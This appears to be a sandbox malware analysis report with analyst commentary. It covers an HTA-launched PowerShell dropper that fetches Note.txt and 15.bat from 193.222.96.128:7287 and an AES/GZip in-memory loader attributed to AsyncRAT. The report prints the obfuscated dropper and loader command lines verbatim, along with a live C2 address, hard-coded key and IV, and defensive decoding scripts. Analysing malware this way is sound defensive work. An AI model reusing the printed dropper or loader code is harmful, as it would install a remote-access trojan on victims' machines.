"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.8.1396890668\1422348576" -childID 7 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {936b04b0-ee0c-4157-b1c5-4c852db4e4c6} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5932 2e29e8c3b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.9.2007607417\154283277" -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3564 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d765d3-345c-41aa-9b77-e00a0c6f9513} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1540 2e29e629d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.10.131863300\526272546" -childID 9 -isForBrowser -prefsHandle 6476 -prefMapHandle 6472 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f0d99e0-3fc9-4558-af31-b6884fcaa9b5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6488 2e2a4b95358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.11.1475847541\2054531302" -childID 10 -isForBrowser -prefsHandle 6736 -prefMapHandle 6732 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54cc6389-6d2a-4122-b527-e49c3cbbb04f} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6708 2e2a5b09058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.12.1487225003\675476188" -childID 11 -isForBrowser -prefsHandle 6968 -prefMapHandle 6964 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e85508ba-addf-4b88-947e-fd370e035bb2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6976 2e2a5bbe258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.13.1180940323\1997716798" -childID 12 -isForBrowser -prefsHandle 6040 -prefMapHandle 5956 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec513b2-3673-4470-b3ef-251a8ae8dcf2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6056 2e2a5971858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.14.1840811761\1315247919" -childID 13 -isForBrowser -prefsHandle 6092 -prefMapHandle 5692 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {856cd291-dc3a-42b0-88b2-1e5aa830bba5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 8148 2e2a5df8258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.15.1536033044\310627983" -childID 14 -isForBrowser -prefsHandle 6652 -prefMapHandle 6700 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b9b3bf0-6f97-4a4c-b559-d964be68553c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 7724 2e2a4b94a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.16.615557995\1179932124" -childID 15 -isForBrowser -prefsHandle 7992 -prefMapHandle 6700 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b80b8ef-e7b3-4a6b-8e67-22d19d179b12} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5436 2e2a4eb4b58 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\index.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
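The PowerShell that mshta.exe launches from index.hta hides every string as an array of integers and rebuilds it at run time in wTbQxZaeCBFXfE by subtracting 68299 from each element. The rest of the script is a small dispatcher: EcjCVmfjLDzFvM downloads with Net.WebClient, gkzChlFZJJ writes the bytes with WriteAllBytes, and EHyqZyfXS runs the result by extension (rundll32 for .dll, powershell -File for .ps1, misexec (sic, a typo that would fail) for .msi, Start-Process otherwise). odaqkEMluKlVzieGjH first opens %AppData%\Note.txt as a decoy (the "Opens file in notepad" signature) and then drops and runs %AppData%\15.bat, reusing either file if it already exists. The script below is an added analyst tool, not part of the report or of the sample: it decodes the arrays copied from the command line above, assuming only Windows PowerShell 5.1 or later.

```powershell
# Added example (analyst tooling, not code from the report or from the malware):
# decodes the integer arrays that the stage-1 PowerShell launched by mshta.exe
# passes to its wTbQxZaeCBFXfE function. Each element is a character code plus
# 68299, so the decoder is a per-element subtraction followed by a join.

$Offset = 68299   # $gCTQwIlSnN in the original script

function ConvertFrom-OffsetArray {
    param([int[]]$Codes)
    # Same operation as the malware's loop: [char]($code - 68299), concatenated.
    -join ($Codes | ForEach-Object { [char]($_ - $Offset) })
}

function ConvertFrom-OffsetArrayText {
    # Finds every "@(n,n,...)" literal in a blob of script text (for example a
    # command line pasted from a sandbox report) and decodes it; -Constant covers
    # sibling samples that use the same trick with a different offset.
    param([string]$Text, [int]$Constant = $Offset)
    foreach ($m in [regex]::Matches($Text, '@\((\d+(?:,\d+)+)\)')) {
        $codes = [int[]]($m.Groups[1].Value -split ',')
        -join ($codes | ForEach-Object { [char]($_ - $Constant) })
    }
}

# Arrays copied verbatim from the command line above, labelled by where the
# original script uses the decoded string.
$Arrays = [ordered]@{
    'EndsWith #1 (rundll32 branch)'   = 68345,68399,68407,68407
    'EndsWith #2 (powershell branch)' = 68345,68411,68414,68348
    'EndsWith #3 (misexec branch)'    = 68345,68408,68414,68404
    'New-Object type'                 = 68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415
    'download saved as Note.txt'      = 68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415
    'download saved as 15.bat'        = 68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415
}

foreach ($label in $Arrays.Keys) {
    '{0,-32} {1}' -f $label, (ConvertFrom-OffsetArray $Arrays[$label])
}
```

Run as-is it prints the six strings: the three extension checks .dll, .ps1 and .msi, the type name Net.WebClient, and the two download URLs http://193.222.96.128:7287/Note.txt and http://193.222.96.128:7287/15.bat, which match the Note.txt and 15.bat files and the 193.222.96.128:7287 connections recorded elsewhere in this report. ConvertFrom-OffsetArrayText (Get-Clipboard) does the same for a command line pasted from another report.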

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Note.txt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\15.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\15.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.17.1721563505\970642768" -childID 16 -isForBrowser -prefsHandle 1288 -prefMapHandle 7468 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7c8016a-e570-4d3f-88db-dfe68a2b2196} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 4692 2e2a8e1b358 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\15.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\15.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
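Both copies of 15.bat above (the %AppData%\Roaming one dropped by stage 1 and the Downloads one the analyst ran by hand) carry the same loader. cmd.exe echoes the PowerShell text into powershell.exe -w hidden over stdin after setting the console title to the .bat's own path, which is how the script later finds its own file through [Console]::Title. The $MMJz array holds .NET member names with a junk token spliced into each and stripped by .Replace(): GetCurrentProcess, ChangeExtension, ElementAt, CreateDecryptor, Split, Decompress, EntryPoint, CopyTo, ReadLines, Invoke, TransformFinalBlock, MainModule, FromBase64String, Load (several are unused here). With those substituted, the loader reads its own file, takes the lines at 0-based index 5 and 6, drops the first two characters of each, Base64-decodes, AES-256-CBC-decrypts with the hard-coded key and IV, GZip-decompresses and Assembly.Load()s each result, invoking its EntryPoint (index 6 first, then index 5). Because key and IV sit in the command line, the payloads can be recovered offline without executing anything. The script below is an added analyst tool, not part of the report or of the sample: it reproduces the decrypt-and-inflate pipeline but writes the results to disk instead of loading them. The output directory and file names are the author's choice; the report does not show 15.bat itself, so the two characters the loader skips at the start of each line are not stated here.

```powershell
# Added example (analyst tooling, not code from the report or from the malware):
# a defanged re-implementation of the 15.bat loader that decrypts and inflates the
# two embedded payloads and writes them to disk instead of Assembly.Load()ing them.
# Run only inside an isolated analysis VM that already holds the sample.

function Export-Stage2Payloads {
    param(
        [Parameter(Mandatory)][string]$BatPath,   # the dropped 15.bat
        [Parameter(Mandatory)][string]$OutDir     # where to write the decrypted blobs (author's choice)
    )

    # AES-256-CBC key and IV, copied from the loader's command line above.
    $key = [Convert]::FromBase64String('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=')  # 32 bytes
    $iv  = [Convert]::FromBase64String('rrMf8DdSiOTkJYW5AhOOlg==')                      # 16 bytes

    # The loader reads its own file (ReadLines on the path in the console title)
    # and picks the lines at 0-based index 5 and 6; Get-Content gives the same indexing.
    $lines = Get-Content -LiteralPath $BatPath
    if ($lines.Count -lt 7) { throw "Expected at least 7 lines in $BatPath, got $($lines.Count)" }

    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $outDirFull = (Resolve-Path -LiteralPath $OutDir).Path

    # Same order as the loader: index 6 is loaded and invoked first, then index 5.
    $results = @()
    foreach ($index in 6, 5) {
        # Substring(2) mirrors the loader; the report does not show what the two skipped characters are.
        $cipher = [Convert]::FromBase64String($lines[$index].Substring(2))

        # AES layer, exactly as in FBejp(): CBC mode, PKCS7 padding, one TransformFinalBlock call.
        $aes = [System.Security.Cryptography.Aes]::Create()
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $key
        $aes.IV  = $iv
        $decryptor = $aes.CreateDecryptor()
        try     { $plain = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length) }
        finally { $decryptor.Dispose(); $aes.Dispose() }

        # GZip layer on top of the AES layer, exactly as in mpyCC().
        $inStream  = New-Object System.IO.MemoryStream(,$plain)
        $outStream = New-Object System.IO.MemoryStream
        $gzip = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
        try { $gzip.CopyTo($outStream) } finally { $gzip.Dispose(); $inStream.Dispose() }
        $payload = $outStream.ToArray()
        $outStream.Dispose()

        # Assembly.Load() needs a .NET PE image, so a genuine payload starts with 'MZ'.
        $isPe = ($payload.Length -ge 2) -and ($payload[0] -eq 0x4D) -and ($payload[1] -eq 0x5A)

        # Write instead of load; file name is the author's convention, not the malware's.
        $outFile = Join-Path $outDirFull ("15bat_line{0}.bin" -f $index)
        [System.IO.File]::WriteAllBytes($outFile, $payload)

        $results += [pscustomobject]@{
            LineIndex = $index
            Bytes     = $payload.Length
            MzHeader  = $isPe
            Path      = $outFile
        }
    }
    $results
}

# Usage: sample path as recorded in the report, output directory chosen here for the example.
Export-Stage2Payloads -BatPath 'C:\Users\Admin\Downloads\15.bat' -OutDir 'C:\analysis\15bat' | Format-Table
```

For each of the two lines the script reports the inflated size and whether the blob starts with the MZ header that Assembly.Load() requires; the written files can then go straight to a .NET decompiler to confirm the AsyncRAT identification the report makes. If a sibling sample changes the key, IV or line indices, those three values are the only ones to update.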

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\15.bat

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.18.613164890\1751689591" -childID 17 -isForBrowser -prefsHandle 7844 -prefMapHandle 6404 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c038c7b-35d0-4a97-b254-684fa5a3c099} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3600 2e2aaf7f858 tab

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
N/A 127.0.0.1:54846 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 35.83.153.5:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 128.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 5.153.83.35.in-addr.arpa udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
N/A 127.0.0.1:54855 tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:80 virustotal.com tcp
US 216.239.32.21:80 virustotal.com tcp
US 8.8.8.8:53 virustotal.com udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:443 virustotal.com tcp
US 8.8.8.8:53 www.virustotal.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.recaptcha.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
GB 142.250.180.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 21.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net tcp
US 8.8.8.8:53 recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
